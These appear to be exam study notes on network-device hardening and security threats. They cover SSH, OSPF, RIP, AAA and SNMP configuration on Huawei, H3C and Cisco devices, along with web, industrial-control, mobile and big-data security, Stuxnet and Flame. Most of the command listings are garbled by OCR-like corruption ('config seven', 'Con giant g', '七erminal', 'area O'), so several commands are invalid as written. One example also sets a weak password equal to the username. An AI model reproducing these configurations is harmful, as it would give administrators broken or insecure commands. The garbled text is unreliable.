Press CTRL+C to abort.
Input the modulus length [default = 1024]:
Generating Keys…
Create the key pair successfully.
[H3C]ssh server enable
//开启ssh服务
[H3C]line vty 0 4
[H3C-line-vty0-4]authentication-mode scheme
[H3C-line-vty0-4]protocol inbound ssh
[H3C-line-vty0-4]quit
华为ssh配置:
[Huawei]rsa local-key-pair create //生成rsa密钥
The key name will be: Huawei_Host
The range of public key size is (512 ~ 2048). //回车,默认size为512
NOTES: If the key modulus is greater than 512,
it will take a few minutes.
Input the bits in the modulus[default = 512]:
Generating keys…
…++++++++++++
…++++++++++++
…++++++++
…++++++++
[Huawei]user-interface vty 0 4
[Huawei-ui-vty0-4]authentication-mode aaa
[Huawei-ui-vty0-4]protocol inbound ssh
[Huawei]ssh user huawei //Create ssh user huawei
[Huawei]ssh user huawei authentication-type password //Configure the ssh user huawei authentication method as password
[Huawei]aaa
[Huawei-aaa]local-user huawei password cipher huawei //Set the password of local user huawei as huawei
[Huawei-aaa]local-user huawei privilege level 15 //Set the privilege level of local user huawei to 15 (the highest privilege)
[Huawei-aaa]local-user huawei service-type ssh //Set the service type of local user huawei to ssh
[Huawei]ssh user huawei service -type stelnet //Set the service type of ssh user huawei to stelnet
[Huawei]stelnet server enable //Enable stelnet service
What are the security threats to switches:
Mac address flooding: Forging a large number of virtual mac addresses and sending them to the switch, resulting in an upper limit on the switch's mac address and making it impossible to work with normal mac addresses.
Network management generally includes configuration management, performance management, security management, fault management, etc. in terms of functions.
Arp viruses are divided into three categories: arp gateway spoofing, arp man-in-the-middle attack, and arp flooding.
arp spoofing: The attacker sends false arp messages in response to the initiating target host to perform address spoofing.
Password threats: weak passwords, clear text transmission of passwords, etc.
Vulnerability exploitation: denial of service attack, unauthorized access, information leakage, call hijacking.
OSPF security authentication has three authentication methods: interface authentication, regional authentication, and virtual link authentication.
ATP Advanced Persistent Threat: intelligence collection, defense breakthrough, channel establishment, lateral penetration, information collection and external communication
2. Router security threats:
Secure storage of router passwords:
The router first uses MD5 to hash the administrator password information, and then saves it to the router configuration file.
Remote secure access to the router Telnet is commonly used to access the router remotely, but Telnet can easily leak sensitive password information. Therefore, in order to enhance the security management of the router, administrators use SSH to replace Telnet.
ospf authentication
North# config seven
Enter configura on commands, one per line. End with CNTL/Z.
North(config)# router ospf 1
North(config-router)# network 14.1.xy 0.0.255.255 area O
North(config- router)# area O au seven hen seven ica seven ion message-digest
North(config-router)# exit
North(config)# int eth0/1
North(config-if)# ip ospf message-diges seven key 1 md5 rou seven es-4-all
l) Enable authentication of OSPF routing protocol
Router(Config)# router ospf 100
Router(Config-router)#network 192.168.100.0 0.0.0.255 area 100
! Enable MD5 authentication.
! area area-id authentcation enables authentication, which is Longman password authentication.
I area area-id authentication message-digest
Router(Con giant g-router)# area 100 authentication message-digest
Router(Config)# exit
Router(Config)# interface eth0/1
I enable MD5 key Key is routerospfkey.
I ip ospf authentication-key key enables the authentication key, but it will be transmitted in clear text.
I ip ospf message-digest-key key-id(l-255) md5 key
Router(Con giant g-if)# ip ospf message-digest-key 1 md5 routerspfkey
Only RIP-V2 supports it, RIP-VI does not. It is recommended to enable RIP-V2 and use MD5 authentication. Ordinary authentication
is also transmitted in clear text.
Router(Config)# config terminal
! Enable setting key chain
Router(Config)# key chain mykeychainname
Router(Config-keychain)# key 1
I Set key string
Router(Config-leychain-key)# key-string MyFirstKeyString
Router(Config-keyschain)# key 2
Router(Config-keychain-key)# key-string MySecondKeyString
I Enable RIP-V2
Router(Config)# router rip
Router(Config-router)# version 2
Router(Config-router)# network 192.168.100.0
Router(Config)# interface eth0/1
, use MD5 mode authentication, and select the configured key chain
Chapter 21 Network Device Security I 461
Router(Config-if)# ip rip authentication mode md5
Router(Config-if)# ip rip anthentication key- chain mykeychainname
Ability to check the accuracy of source IP addresses, thereby preventing certain IP spooling. But it can only
be used on routers with CEF (Cisco Express Forwarding) enabled.
Rou sevener# config t
! Enable CEF
Router(Config)# ip cef
I Enable Unicast Reverse-Path Veritcaton
Router(Config)# interface eth0/1
Router(Config)# ip verify unicast reverse-path
When a user accesses the router, he or she must be authenticated before being allowed. The user name and password of a certain router
are configured as follows.
Central# config Seven
Enter configura Seven ion commands, one per line. End with CNTL/Z.
Central(config)# username rsmith password 3d-zirc0nia
Central(config)# username rsmith privilege 1
Cen Seven ral(config)# username bjones password 2B-or-3B
Central(config)# username bjones privilege 1
enable password is a global command to restrict access to privileged mode.
When you only enter enable password + password, for example, the password setting is 123, you need to enter password 123 when entering privilege mode. When you enter
enable secret class, to enter privilege mode, the password you need to enter must be : class enable secret+password, but it is regarded as an encrypted form of password.
When you set enable password + password and enable secret+password at the same time, the password of enable secret will replace the password of enable password.
The process of using the Console password is as follows:
Rou sevener#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(con giant g)#l ine console 0
Router(config-line)#login
Router(config -line)#password console-password
The password authentication configuration file of the network device for Console, AUX and VTY passwords is as follows:
line con 0
password console-password
login
line aux 0
password aux-password
login
line v seven y O 4
password v seven y-password
login
tacacs认证:
Router#config 七erminal
En 七er configura 巨on commands, one per line. End with CNTL/Z.
Rou 七er(config)#aaa new-model
Router(config)#tacacs-server host X.Y.Z.10
Router(config) #tacacs-server key MyTACACSkey
Rou 七er(config)#aaa authentication login default group tacacs+ local
Router(config)#line aux 0
Router(config-line)#login authentication default
Router(config-line)#exit
Router(config)#line vty O 4
Router(config-line)#login authentication default
Router(config-line)#"Z
Now take the router using RADIUS for authentication through VTY as an example. The IP address of the RADIUS server is
XYZ5, and the server's key is MyRADIUSkey. The configuration process is as follows:
Router#config 7erminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#aaa new-model
Router(config)#radius-server host X . Y…Z.5
Router(cong)#radius-server key MyRADIUSkey
Router(config)#aaa authentication login defaul group radius local
Router(config)#line con 0
Router(config-line)#login authentication default
Router(config-line)#exit
Router(config)#line vty O 4
Router(config-line)#login authentication default
Router (config-line)#"Z
console口访问控制:
Router(Config)#Access-list 1 permit X.Y.Z.1
Router(Config)#line con 0
Router(Config-line)#Transport input none
Router(Config-line)#Login local
Rou 七er(Config-line)#Exec-timeoute 5 0
Router(Config-line)#access-class 1 in
Router(Config-line)#end
vty访问控制:
Router#config terminal
En 七er configuration commands, one per line. End with CNTL/Z.
Router(config)#access-list 10 permit X.Y.Z.12
Router(config)#access-list 10 permit X.Y.Z.5
Router(config)#access-list 10 deny any
Router(config)#line vty O 4
Router(config-line)#access-class 10 in
Router(config-line)#"'Z
超时限制配置如下:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#service tcp-keepalives-in
Router(config)#line vty O 4
Router(config-line)#exec-timeout 5 0
Router(config-line)#~Z
http authentication configuration:
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#ip http authentication type
Router(config)#"Z
Router#
Among them, type can be set to enable or local , tacacs or aaa.
snmp configuration:
(1) Set the community string for read-only SNMP access mode.
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#snmp-server communiy UnGuessableStringReadOnly RO
Router(config)#"Z
Restrict telnet:
Only the host with the IP address XYZ6 is allowed to access the Telnet service of the router.
Rou ter(config)#access-list 99 permit XYZ6 log
Rou ter(config)#access-list 99 deny any log
Router(config)#line vty O 4
Router(config-line)#access-class 99 in
Router(config — line)#exec-timeout 5 0
Router(config—line)#login local
Router(config— line) #transport input telnet
Router(config-line)#exec
Router(config-line)#end
In view of the potential operational security risks of switches and routers, switches and routers provide a permission classification mechanism. Each permission
level corresponds to different operational capabilities. In Cisco network equipment, permissions are divided into 16 levels from 0 to 15, with 0 being the lowest level
and 15 being the highest level. The higher the level, the more operating permissions. The specific configuration is as follows:
Router>show privilege
Curren tprivilege level is 1
Router>enable 5
Password: level-5-password
Router#show privilege
Current privilege level is 5
Router#
思科ssh配置:
Rou 七er#config 七erminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname RouterOne
RouterOne(config)#ip domain-name mydomain.com
RouterOne(config)#crypto key generate rsa
The name for the keys will be: Rou 七erOne
Choose the size of the key modulus in the range of 360 七o 2048 for your
General Purpose Keys. Choosing a key modulus greater than 512 may take
a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys…
[OK]
RouterOne(config)#ip ssh time-out 60
RouterOne(ccoonnffii g)#ip ssh authentication-retries 2
RouterOne(config)#line vty O 4
RouterOne(config-line)#transport input ssh
RouterOne(config-line)#"Z
Vulnerability exploitation: denial of service attack, unauthorized access, information leakage, call hijacking, security bypass.
Password security threats: weak passwords, clear text transmission of passwords, etc.
Router protocol security threats: malicious routing protocol packets, causing routing service errors.
dos/ddos: exploit tcp/ip protocol vulnerabilities to carry out denial of server attacks.
Dependency threats: Destroy the routing operating environment, causing the router to operate abnormally.
Technical methods to increase router security
Upgrade the operating system and patches in time
Turn off unnecessary network services
1. Disable CDP
2. Disable other TCP\UDP Small services
3. Disable Finger service
Explicitly ban unused ports
Disable IP direct broadcast and source routing
Enhance router CTX security
Block malicious data packets
Router password security
Transmission encryption
Enhance router SNMP security
3. Two authentication mechanisms for network devices:
radius steps:
The aaa new-model command enables AAA.
The radius-server host command specifies the RADIUS server.
The radius-server key command notifies the RADIUS server's key
to define the default AAA authentication method, and uses local authentication as Backup
the configuration to use the AAA authentication method.
The radius protocol is the upd protocol, the authentication and authorization port is 1812, and the accounting port is 1813
tacacs:
aaa new-model Enable AAA
tacacs-server host Specify the TACACS+ server
tacacs-server key Notify the TACACS+ server of the key
Define the default AAA authentication method and use local authentication as a backup
Configure the use of the AAA authentication method.
4. There are two methods for secure communication between network equipment and management workstations: SSH and VPN.
SSH: For remote access security, network equipment provides SSH service to replace non-secure Telnet. The configuration steps are as follows:
hostname specifies the device name
ip domain-name configures the device domain
crypto key generators to generate RSA encryption keys. The recommended minimum key size is 1024 bits.
ipssh sets SSH access.
The transport input command configures the use of SSH.
The prerequisite for various performance requirements of ipsec vpn is that the Ethernet frames are 64 and 1428 bytes respectively.
IPSec VPN: If the network device supports IPSec, it can ensure that the network communication content between the management workstation and the network device is encrypted and transmitted. The main configuration steps are as follows:
create an IKE security proposal, use ACL to capture the flow of interest, and associate the IKE security proposal And establish IKE peers, create ipsec security proposals, create ipsec security policies and associate all the above contents, apply ipsec security policies to device interfaces and determine the direction.
Out-of-band access does not rely on other networks, while in-band access requires network support.
Console Port is accessed by default and requires physical access to network devices. AUX Port provides out-of-band access and can be connected to network equipment through a terminal server or modem, and administrators can access it remotely.
Code Execution. This type of vulnerability allows attackers to control network equipment, causing the network system
to lose control, which is extremely harmful. CVE-2000-0945 Information indicates that the web configuration interface of Cisco Catalyst 3500 XL switches allows remote attackers to execute arbitrary commands without authentication.
Overflow. Exploitation of this type of vulnerability can lead to denial of service, privilege, or security bypass. CVE-2006-4650
vulnerability information shows that Cisco IOS 12.0, 12.1, and 12.2 handle GREIP improperly and there is an integer overflow. An attacker can inject specially constructed packets into the routing queue, thereby causing the routing ACL to be bypassed.
Memory Corruption. Exploits of memory corruption vulnerabilities often cause denial-of-service attacks on routers
. CVE-2010-0576 vulnerability information shows that Cisco IOS 12.4 improperly handles Multi Protocol Label Switching (MPLS) packets, allowing attackers to remotely construct malicious packets to interfere with the operation of Cisco-related network equipment, causing a denial of service.
Twenty-two (key points), the security of the website has the following main points: confidentiality, integrity, availability, and controllability.
There are two main aspects of web vulnerabilities:
technical security vulnerabilities: vulnerability attacks caused by improper technical handling, SQL injection, cross-site scripting XSS, and malicious file execution.
Business logic security vulnerabilities: Vulnerabilities caused by insufficient consideration of process security in business logic
Website security threats mainly include:
unauthorized access, web page tampering, data leakage, malicious code, website counterfeiting, denial of service, website backend management security threats
OWASP Top 10 is an international open web application security group that releases the top 10 web vulnerabilities.
Credential stuffing: Use the target account password information obtained elsewhere to test login to the current target to be attacked.
Common web denial-of-service attacks: UDP flood, ICMP flood, SYN flood, HTTPflood
2. Apache web security threats:
Apache software configuration threats: directory indexing, resource location prediction, information leakage
Apache software program threats: buffer overflow
Apache web security mechanism threats: password brute force cracking, password authorization errors, weak passwords
Apache application threats : SQL injection attack, input validation error vulnerability attack.
Apache communication threats: Apache generally transmits HTTP in clear text.
Apache service content threats: web page tampering, phishing.
Apache denial of service attack: ddos exhausts resources.
Delete files that are not used by Apache by default:
Apache source code files
Default HTML files
CGI program examples
Default user files
3. IIS security mechanism: IIS authentication, IIS access control, IIS audit
11S supports multiple authentication methods, mainly including the following:
• Anonymous Authentication. When other authentication measures are missing, anonymous authentication is implemented.
• Basic Authentication, providing basic authentication services.
• Certificate Mapping Authentication, implements
certificate authentication based on Active Directory.
• Digital signature authentication (Digest Authentication), implements digital signature authentication.
• 11S Certificate Mapping Authentication, which implements certificate
authentication based on 11S configuration.
• Windows Authentication, integrated (NTLM) authentication.
IIS security threats:
Unauthorized access: Obtaining special permissions through IIS configuration errors or system vulnerabilities.
Network worms: buffer overflow vulnerability, code red network worm attack.
Web page tampering: modify the content of IIS web pages.
Denial of service attacks: ddos exhausts resources.
IIS software vulnerabilities: XSS attacks, code execution, overflow, privilege escalation, memory corruption, information leakage and other attacks.
IIS security enhancement:
install iis patches promptly,
enable dynamic IIS restrictions,
enable urlscan,
enable iis application firewall,
enable ssl service
4. Injection attacks: SQL injection attack, nosql injection, os injection, ldap injection.
In Web services, a three-tier architecture model is generally adopted: browser + Web server + database
5. The second-level website must be evaluated every two years, and the third-level website must be evaluated once a year.
When accessing the Internet, in order to prevent malicious code in Web pages from damaging your computer, the preventive measure you can take is to allocate the Web sites you want to visit to different security zones of the browser according to their credibility.
There are 4 zones, the default is the internet zone, and the other 3 are local zone, trusted zone, and restricted zone.
In principle, the information security level of government websites should not be lower than level two. Level 3 websites should be assessed once a year, and level 2 websites
should be assessed every two years.
There are two main types of website anti-tampering technologies:
one is to use the operating system's file call events to detect changes in the integrity of web page files to prevent the website from being modified without authorization;
the other is to use cryptography's one-way functions to detect changes in the website's integrity. whether the file has been changed. If it is detected that the web page has been illegally modified, the web page recovery mechanism will be started to automatically replace the damaged page with a normal page file.
23 (key points). According to management and technical requirements, the cloud data center requires:
one center: security management center
and triple protection: secure computing environment, security area boundary, and secure communication network.
IT resources are provided in the form of services: Infrastructure as a Service Iaas, Platform as a Service Paas, Software as a Service
SaaS, Data as a Service DaaS, Storage as a Service STaaS
Cloud computing technology security requirements
1. Cloud security requirements analysis – ensuring that cloud users can obtain trusted cloud services
1. Cloud user identification and authentication
2. Cloud user resource access control
3. Cloud user data secure storage
4. Cloud equipment and service software Security
2. Analysis of network security communication security requirements – to ensure the security of cloud users’ timely access to cloud services and online data.
Technologies include: identity authentication, key distribution, data encryption, channel encryption, firewall, VPN, anti-denial of service
3.
Cloud Computing platform security requirements analysis – to ensure the security credibility and business continuity of cloud services,
mainly including: physical environment security, host server security, operating system security, database security, application and
data security, cloud operating system security, and virtual machine security , Multi-tenant security isolation
24. 2.
The disaster recovery and backup of the cloud data center adopts the three-center solution in two places:
two places: same city and remote
location; three centers: production center, same-city disaster recovery center, and remote disaster recovery center.
Cloud computing is the technology and development application of distributed computing, parallel computing, and grid computing.
Twenty-five (key points), the security attributes of industrial control are reversed: availability, integrity, confidentiality.
Security threat analysis of industrial control systems: natural disasters and environment, internal security threats, equipment functional safety failures, malicious code, and network attacks
Industrial control system security risks: industrial control protocol security, industrial control system technology product security vulnerabilities, industrial control system basic software security vulnerabilities, industrial control system algorithm security vulnerabilities, industrial control system equipment firmware vulnerabilities, industrial control system open access vulnerabilities, industrial control system supply chain security
Industrial control system security protection mechanisms and technologies: physical and environmental security protection, security zoning and boundary protection, identity authentication and
access control, remote access security, malicious code prevention, data security, network security detection and emergency response, security management
4. Industrial control systems are generally divided into discrete manufacturing and process control. Malicious codes pose the greatest threat to industrial control systems: Stuxnet virus and Flame virus.
The full name of the "Flame" virus is Worm.Win32.Flame. It is a backdoor program and Trojan horse virus, and it also has the characteristics of a worm virus. As long as the operator behind it gives instructions, it can replicate itself on the Internet and mobile devices. Once a computer system is infected, the virus will start a series of complex actions, including monitoring network traffic, taking screenshots, recording audio conversations, intercepting keyboard input, etc. Flame virus is considered to be the largest and most complex network attack virus ever discovered. The virus can replicate and spread through USB memories and networks. Once the task of collecting data is completed, these viruses can also destroy themselves without leaving a trace. It can also use the infected computer as a "beacon" to discover devices transmitting via Bluetooth and provide the operator behind it with the status of malicious programs programmed into the device information.
Stuxnet refers to a worm virus. Its level of sophistication far exceeds the capabilities of the average computer hacker. The Stuxnet virus was first detected in June 2010. It was the first "worm" virus specifically targeted to attack real-world infrastructure (energy) facilities, such as nuclear power plants, dams, and the national power grid. Internet security experts are concerned. The Stuxnet virus exploited four previously undiscovered vulnerabilities in Microsoft's Windows operating system. Criminal hackers typically exploit these vulnerabilities to steal bank and credit card information to make illegal income. The Stuxnet virus is not as profitable as some malware. It requires money to develop. This is one reason why experts believe that the Stuxnet virus originated from the intelligence services. This new virus adopts a variety of advanced technologies, so it has extremely strong stealth and destructive power. As long as the computer operator inserts the virus-infected USB flash drive into the USB interface, the virus will take control of some industrial computer systems without anyone noticing (no other operation requirements or prompts will appear) .
The security strategy of the power monitoring system is: security partition, network dedicated, horizontal isolation, and vertical authentication.
5. The components of industrial control systems: SCADA system, distributed control system (DCS), process control system (PCS), programmable logic controller (PLC), remote terminal (RTU), CNC machine tools and CNC systems.
PLC mainly executes various operations, sequence control, timing and other instructions to control the actions of industrial production equipment. It is the basic unit of industrial control system.
Master Terminal Unit (MTU)
MTU is the abbreviation of Master Terminal Unit. MTU is generally deployed in the dispatch control center, mainly used for
information collection and monitoring of the production process, and maintains communication with the RTU through the network.
Remote Terminal Unit (RTU) RTU is the abbreviation of Remote Terminal Unit. RTU is mainly used for information collection, automatic measurement recording and transmission in the production process, and maintains communication with MTU through the network.
Human-Machine Interface (HMI)HMI is the abbreviation of Human-Machine Interface. HMI is a software and hardware platform that provides operation interface and data communication between the operator and the controller. At present, industrial control systems mainly use computer terminals for human-computer interaction.
Industrial control communication networks are connectors for various industrial control equipment and components. Traditional industrial communication networks are generally
constructed using dedicated protocols to form a closed network. Common industrial control-specific protocols include OPC, Modbus, DNP3, etc. Industrial communication network types include DCS main control network, SCADA remote network, on-site control level communication network, etc. With the application and development of Internet technology, TCP/IP protocols are gradually applied to industrial control systems, such as smart equipment, smart buildings, smart factories and other control systems.
Mobile operating system platform security threats
Wireless network attacks
Malicious code
Mobile application code reverse engineering
Illegal tampering of mobile applications
Mobile application APP security reinforcement: anti-decompilation, anti-debugging, anti-tampering, anti-theft
6. The Android system architecture is divided into: Linux kernel layer, system runtime layer, application framework layer, and application layer.
Application framework layer: Using the program signature mechanism, all software installed on the mobile phone has a digital certificate to verify the security of the software.
System runtime library layer: Use the sandbox mechanism to enable applications and the corresponding running Dalvik virtual machines to run in independent Linux process spaces and not intersect with other applications to achieve complete isolation.
Permissions at the application layer include: normal (normal) permissions, dangerous (dangerous) permissions, signature (signature) permissions, signatureOrSystem permissions:
normal permissions will not cause substantial harm to users.
Dangerous permissions may bring potential threats to users, such as reading user location information, reading phone books, etc. For such security threats, most mobile phones will currently remind users when they install applications.
signature permission means that only applications with the same signature can access
signaturegnatureOrSystem permissions are mainly used by equipment vendors
7. Android system security mechanism:
Network communication encryption: Supports the use of SSL/TLS for encrypted data transmission.
Kernel security mechanism: controlled by partition and linux acl permissions.
If the Android system distinguishes security mechanisms by layers:
application layer: permission declaration mechanism.
Application framework layer: application signing mechanism.
System runtime layer: security sandbox, network communication security SSL
kernel layer: file system security, selinux
8. IOS Apple system architecture: core operating system layer, core service layer, media layer, and touchable layer.
IOS system security mechanism: The security architecture of the iOS platform can be divided into hardware, firmware, and software.
IOS security mechanism:
secure boot chain,
sandbox mechanism,
address space randomization,
code signing,
data encryption
Mobile office mainly faces the following risks:
• Loss of equipment. Control lost devices to access corporate intranets, steal corporate confidential data, and destroy backend systems.
• Information leakage. Sensitive data stored in local devices is lost or stolen, resulting in information leakage.
• attack on purpose. Implant malicious programs to conduct intrusion attacks on organizational servers.
• Shared access. Employees share devices, account passwords, and leak organizational confidential information.
Common mobile application App network security detection contents are as follows:
• Identity authentication mechanism detection; . Communication session security mechanism detection;
• Sensitive information protection mechanism detection;
• Log security policy detection;
• Transaction process security mechanism detection;
• Server authentication mechanism Detection;
• Access control mechanism detection; • Data tamper resistance detection; • SQL injection
prevention capability detection; • Anti-phishing security capability detection; • App security vulnerability detection.
Mobile app security hardening:
anti-decompilation,
anti-debugging,
anti-tampering
, anti-theft
9. Characteristics of big data:
massive data, rapid data flow, diverse data types, and data value density.
Big data security protection technology: digital signature technology is used for data authenticity, hash algorithm is used for data integrity, and encryption algorithm is used to protect the confidentiality of big data.
10. Big data business authorization is based on role access authorization technology.
The country has promulgated regulations, policies and standards such as the "Information Security Technology Personal Information Security Specifications" (implemented on October 1, 2020) . Focusing on privacy protection, the main technologies include data identity anonymity, data differential privacy, data desensitization, data encryption, data access control, etc.
11. Big data security control:
Before data processing: evaluate the authenticity, legality, business secrets, etc. of the data source.
Data processing: multi-tenant isolation control, unified metadata management, data desensitization control, unified access monitoring and auditing.
After data processing: data security control, data encryption platform services.
Data compliance testing:
Big data security threats:
The security boundaries of “data sets” are becoming increasingly blurred, making security protection more difficult
Increased security risks of sensitive data leakage
Security risks of data distortion and big data pollution
Business continuity and denial of service of big data processing platforms
Personal data Widely distributed in multiple data product backends, can privacy protection be increased
? Data transaction security risks
? Big data abuse
Big data security requirements analysis:
Big data's own security - authenticity, real-time, confidentiality, integrity, availability, traceability
Big data security compliance - meet data security policies and regulations
Big data cross-border security
Big data privacy protection
Big data processing platform security
Big data business security
Big data operation security
…over